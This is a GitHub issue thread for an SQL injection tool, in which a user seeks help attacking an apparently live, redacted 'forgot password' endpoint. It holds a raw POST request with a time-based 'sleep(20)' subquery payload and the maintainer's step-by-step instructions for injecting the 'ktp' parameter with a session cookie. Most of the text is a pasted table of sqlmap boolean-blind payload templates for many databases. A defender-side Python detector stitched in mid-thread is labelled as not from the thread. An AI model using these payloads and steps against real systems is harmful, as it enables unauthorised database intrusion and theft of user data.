Can you make an option parameter to support POST request SQL injection #95871

Open
selectfromblackhydra opened this issue Jan 20, 2025 · 5 comments

Comments

@selectfromblackhydra

POST SQL injection needs a parameter to test SQL injection in a POST request, because if not, in my case the SQL injection does not inject or gives a false positive. Can you add subquery SQL injection like sqlmap? Because in my case the injection is vulnerable with subquery injection, boolean blind. Thank you.

@ron190
Owner

ron190 commented Jan 21, 2025

  • Sure, just deploy the advanced panel with the chevron on the right, then select the radio button for POST on the left:

Image

  • Can you be more specific with an error message or a detailed context?

Strategy Blind should work too; you can debug the logs in the Network tab to track the issue. You can also share the sqlmap option tag you are using if you are referring to a specific tag.

@selectfromblackhydra
Author

I mean, can you support POST like this.

POST /forgot_action.php HTTP/1.1
Host: redacted
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=>
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl>
Connection: close
Cache-Control: max-age=0
Cookie: PHPSESSID=fqn1cf8c9aoompe9brgkqr8jn9
Origin: redacted
Upgrade-Insecure-Requests: 1
Referer: redacted.>
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="130",>
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 21

ktp=BoSUhm'%2b(select*from(select(sleep(20)))a)%2b'&nik=BoSUh>
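As an added, defender-side example (this is not jSQL's or sqlmap's code and is not from the thread): a small Python check that parses a request shaped like the one above, URL-decodes the form body and flags parameter values carrying the markers of a blind-injection probe (a timing function such as sleep(), an inline subquery, an unbalanced quote, an AND/OR comparison, a trailing comment). The request text, the dropped truncated headers and the nik value are constructed; the regular expressions are heuristics chosen for this example, not a complete WAF rule set.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample based on the request in the issue: host redacted, the
# truncated headers dropped, and the cut-off nik value replaced with a
# placeholder. It is not a capture from the original thread.
SAMPLE_REQUEST = (
    "POST /forgot_action.php HTTP/1.1\r\n"
    "Host: redacted\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: close\r\n"
    "\r\n"
    "ktp=BoSUhm'%2b(select*from(select(sleep(20)))a)%2b'&nik=BoSUhm"
)

# A benign submission to the same endpoint, also constructed.
BENIGN_REQUEST = (
    "POST /forgot_action.php HTTP/1.1\r\n"
    "Host: redacted\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "ktp=3201234567890001&nik=3201234567890001"
)

# Heuristic markers (assumptions for this example, not a full rule set).
TIME_FUNCS = re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay|dbms_lock\.sleep)\s*\(", re.I)
SUBQUERY = re.compile(r"\(\s*select\b", re.I)
BOOLEAN = re.compile(r"\b(and|or)\b\s*(not\s+)?[\w(\[]+\s*=\s*[\w(\[]+", re.I)
COMMENT_TAIL = re.compile(r"(--|#|/\*)\s*$")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def decode_form(body: str):
    """URL-decode an application/x-www-form-urlencoded body.

    parse_qsl turns %2b into '+' and a literal '+' into a space, so the
    decoded value is what the database layer would actually see.
    """
    return parse_qsl(body, keep_blank_values=True)


def scan_value(value: str):
    """Return the list of injection markers found in one decoded value."""
    findings = []
    if TIME_FUNCS.search(value):
        findings.append("time-based")
    if SUBQUERY.search(value):
        findings.append("subquery")
    if value.count("'") % 2 == 1:
        findings.append("unbalanced-quote")
    if BOOLEAN.search(value):
        findings.append("boolean")
    if COMMENT_TAIL.search(value):
        findings.append("comment-tail")
    return findings


def scan_request(raw: str):
    """Map each suspicious form parameter of a POST request to its markers.

    Only form-encoded POST bodies are inspected; anything else yields {}.
    """
    method, _path, headers, body = parse_request(raw)
    if method != "POST":
        return {}
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return {}
    hits = {}
    for name, value in decode_form(body):
        findings = scan_value(value)
        if findings:
            hits[name] = findings
    return hits


if __name__ == "__main__":
    for label, req in (("probe", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, scan_request(req))
```

Decoding before matching is the point: the probe above only reveals `sleep(` and `(select` once `%2b` has become `+`, and the quotes stay balanced on purpose (string concatenation), so a rule that looks only for a stray quote would miss it.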

@selectfromblackhydra
Author

selectfromblackhydra commented Jan 22, 2025

This target is vulnerable, but no WAF, but I have a connection problem without the correct parameter, which is ktp in sqlmap; I don't know in jSQL.

@ron190
Owner

ron190 commented Jan 22, 2025

I know people use similar block templates, so I'll see if it's possible to integrate it properly, though in jSQL your template is equivalent to what is on the screenshot:

Image

  • Set the <url>/forgot_action.php in the address bar
  • Select the POST radio
  • ⚠ 👉 Copy/paste the request parameters but reverse them to nik=&ktp= to inject ktp, or check the option Inject every Request params in Preference 👈 ⚠
  • Copy/paste the block Host to Content-Length into the header parameter, using the right button to open the modal

Also you may require a proper active session for Cookie: PHPSESSID=, depending on the service tested.

@selectfromblackhydra
Author

Hey Ron, maybe you want to learn the sqlmap payloads; I have the file here:

| Title | stype | level | risk | clause | where | Vector | Request payload | Comment | Response comparison | DBMS |
|---|---|---|---|---|---|---|---|---|---|---|
| AND boolean-based blind - WHERE or HAVING clause | 1 | 1 | 1 | 1,8,9 | 1 | AND [INFERENCE] | AND [RANDNUM]=[RANDNUM] | | AND [RANDNUM]=[RANDNUM1] | |
| OR boolean-based blind - WHERE or HAVING clause | 1 | 1 | 3 | 1,9 | 2 | OR [INFERENCE] | OR [RANDNUM]=[RANDNUM] | | OR [RANDNUM]=[RANDNUM1] | |
| OR boolean-based blind - WHERE or HAVING clause (NOT) | 1 | 3 | 3 | 1,9 | 1 | OR NOT [INFERENCE] | OR NOT [RANDNUM]=[RANDNUM] | | OR NOT [RANDNUM]=[RANDNUM1] | |
| AND boolean-based blind - WHERE or HAVING clause (subquery - comment) | 1 | 2 | 1 | 1,8,9 | 1 | AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) | AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) | [GENERIC_SQL_COMMENT] | AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) | |
| OR boolean-based blind - WHERE or HAVING clause (subquery - comment) | 1 | 2 | 3 | 1,9 | 2 | OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) | OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) | [GENERIC_SQL_COMMENT] | OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) | |
| AND boolean-based blind - WHERE or HAVING clause (comment) | 1 | 2 | 1 | 1 | 1 | AND [INFERENCE] | AND [RANDNUM]=[RANDNUM] | [GENERIC_SQL_COMMENT] | AND [RANDNUM]=[RANDNUM1] | |
| OR boolean-based blind - WHERE or HAVING clause (comment) | 1 | 2 | 3 | 1 | 2 | OR [INFERENCE] | OR [RANDNUM]=[RANDNUM] | [GENERIC_SQL_COMMENT] | OR [RANDNUM]=[RANDNUM1] | |
| OR boolean-based blind - WHERE or HAVING clause (NOT - comment) | 1 | 4 | 3 | 1 | 1 | OR NOT [INFERENCE] | OR NOT [RANDNUM]=[RANDNUM] | [GENERIC_SQL_COMMENT] | OR NOT [RANDNUM]=[RANDNUM1] | |
| AND boolean-based blind - WHERE or HAVING clause (MySQL comment) | 1 | 3 | 1 | 1 | 1 | AND [INFERENCE] | AND [RANDNUM]=[RANDNUM] | # | AND [RANDNUM]=[RANDNUM1] | MySQL |
| OR boolean-based blind - WHERE or HAVING clause (MySQL comment) | 1 | 3 | 3 | 1 | 2 | OR [INFERENCE] | OR [RANDNUM]=[RANDNUM] | # | OR [RANDNUM]=[RANDNUM1] | MySQL |
| OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) | 1 | 3 | 3 | 1 | 1 | OR NOT [INFERENCE] | OR NOT [RANDNUM]=[RANDNUM] | # | OR NOT [RANDNUM]=[RANDNUM1] | MySQL |
| AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) | 1 | 3 | 1 | 1 | 1 | AND [INFERENCE] | AND [RANDNUM]=[RANDNUM] | %16 | AND [RANDNUM]=[RANDNUM1] | Microsoft Access |
| OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment) | 1 | 3 | 3 | 1 | 2 | OR [INFERENCE] | OR [RANDNUM]=[RANDNUM] | %16 | OR [RANDNUM]=[RANDNUM1] | Microsoft Access |
| MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause | 1 | 2 | 1 | 1,2,3 | 1 | RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) | RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END)) | | RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END)) | MySQL |
| MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) | 1 | 3 | 1 | 1,2,3,8 | 1 | AND MAKE_SET([INFERENCE],[RANDNUM]) | AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) | | AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) | MySQL |
| MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) | 1 | 3 | 3 | 1,2,3 | 2 | OR MAKE_SET([INFERENCE],[RANDNUM]) | OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) | | OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) | MySQL |
| MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) | 1 | 4 | 1 | 1,2,3,8 | 1 | AND ELT([INFERENCE],[RANDNUM]) | AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) | | AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) | MySQL |
| MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT) | 1 | 4 | 3 | 1,2,3 | 2 | OR ELT([INFERENCE],[RANDNUM]) | OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) | | OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) | MySQL |
| MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) | 1 | 5 | 1 | 1,2,3,8 | 1 | AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) | AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) | | AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END) | MySQL |
| MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) | 1 | 5 | 3 | 1,2,3,8 | 2 | OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) | OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) | | OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END) | MySQL |
| PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST) | 1 | 2 | 1 | 1,8 | 1 | AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL | AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL | | AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL | PostgreSQL |
| PostgreSQL OR boolean-based blind - WHERE or HAVING clause (CAST) | 1 | 3 | 3 | 1 | 2 | OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL | OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL | | OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL | PostgreSQL |
| Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) | 1 | 2 | 1 | 1 | 1 | AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL | AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL | | AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL | Oracle |
| Oracle OR boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) | 1 | 3 | 3 | 1 | 2 | OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL | OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL | | OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL | Oracle |
| SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON) | 1 | 2 | 1 | 1 | 1 | AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END | AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END | | AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END | SQLite |
| SQLite OR boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (JSON) | 1 | 3 | 3 | 1 | 2 | OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END | OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END | | OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END | SQLite |
| Boolean-based blind - Parameter replace (original value) | 1 | 1 | 1 | 1,2,3 | 3 | (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) | | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) | |
| MySQL boolean-based blind - Parameter replace (MAKE_SET) | 1 | 4 | 1 | 1,2,3 | 3 | MAKE_SET([INFERENCE],[RANDNUM]) | MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) | | MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1]) | MySQL |
| MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) | 1 | 5 | 1 | 1,2,3 | 3 | MAKE_SET([INFERENCE],[ORIGVALUE]) | MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) | | MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE]) | MySQL |
| MySQL boolean-based blind - Parameter replace (ELT) | 1 | 4 | 1 | 1,2,3 | 3 | ELT([INFERENCE],[RANDNUM]) | ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) | | ELT([RANDNUM]=[RANDNUM1],[RANDNUM1]) | MySQL |
| MySQL boolean-based blind - Parameter replace (ELT - original value) | 1 | 5 | 1 | 1,2,3 | 3 | ELT([INFERENCE],[ORIGVALUE]) | ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) | | ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE]) | MySQL |
| MySQL boolean-based blind - Parameter replace (bool*int) | 1 | 4 | 1 | 1,2,3 | 3 | ([INFERENCE])*[RANDNUM] | ([RANDNUM]=[RANDNUM])*[RANDNUM1] | | ([RANDNUM]=[RANDNUM1])*[RANDNUM1] | MySQL |
| MySQL boolean-based blind - Parameter replace (bool*int - original value) | 1 | 5 | 1 | 1,2,3 | 3 | ([INFERENCE])*[ORIGVALUE] | ([RANDNUM]=[RANDNUM])*[ORIGVALUE] | | ([RANDNUM]=[RANDNUM1])*[ORIGVALUE] | MySQL |
| PostgreSQL boolean-based blind - Parameter replace | 1 | 3 | 1 | 1,2,3 | 3 | (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) | | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) | PostgreSQL |
| PostgreSQL boolean-based blind - Parameter replace (original value) | 1 | 4 | 1 | 1,2,3 | 3 | (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) | | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) | PostgreSQL |
| PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES) | 1 | 5 | 1 | 1,2,3 | 3 | (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) | (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) | | (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) | PostgreSQL |
| PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) | 1 | 5 | 1 | 1,2,3 | 3 | (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) | (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) | | (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) | PostgreSQL |
| Microsoft SQL Server/Sybase boolean-based blind - Parameter replace | 1 | 3 | 1 | 1,3 | 3 | (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) | | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) | Microsoft SQL Server, Sybase |
| Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) | 1 | 4 | 1 | 1,3 | 3 | (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) | | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) | Microsoft SQL Server, Sybase |
| Oracle boolean-based blind - Parameter replace | 1 | 3 | 1 | 1,3 | 3 | (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) | | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) | Oracle |
| Oracle boolean-based blind - Parameter replace (original value) | 1 | 4 | 1 | 1,3 | 3 | (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) | | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) | Oracle |
| Informix boolean-based blind - Parameter replace | 1 | 3 | 1 | 1,3 | 3 | (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) | | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) | Informix |
| Informix boolean-based blind - Parameter replace (original value) | 1 | 4 | 1 | 1,3 | 3 | (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) | | (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) | Informix |
| Microsoft Access boolean-based blind - Parameter replace | 1 | 3 | 1 | 1,3 | 3 | IIF([INFERENCE],[RANDNUM],1/0) | IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0) | | IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0) | Microsoft Access |
| Microsoft Access boolean-based blind - Parameter replace (original value) | 1 | 4 | 1 | 1,3 | 3 | IIF([INFERENCE],[ORIGVALUE],1/0) | IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) | | IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0) | Microsoft Access |
| Boolean-based blind - Parameter replace (DUAL) | 1 | 2 | 1 | 1,2,3 | 3 | (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) | (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) | | (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) | |
| Boolean-based blind - Parameter replace (DUAL - original value) | 1 | 3 | 1 | 1,2,3 | 3 | (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) | (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) | | (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) | |
| Boolean-based blind - Parameter replace (CASE) | 1 | 2 | 1 | 1,3 | 3 | (CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END) | (CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END) | | (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END) | |
| Boolean-based blind - Parameter replace (CASE - original value) | 1 | 3 | 1 | 1,3 | 3 | (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) | (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) | | (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) | |
| MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause | 1 | 2 | 1 | 2,3 | 1 | ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) | | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) | MySQL >= 5.0 |
| MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) | 1 | 3 | 1 | 2,3 | 1 | ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) | | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) | MySQL >= 5.0 |
| MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause | 1 | 3 | 1 | 2,3 | 1 | ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) | | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) | MySQL < 5.0 |
| MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value) | 1 | 4 | 1 | 2,3 | 1 | ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) | | ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) | MySQL < 5.0 |
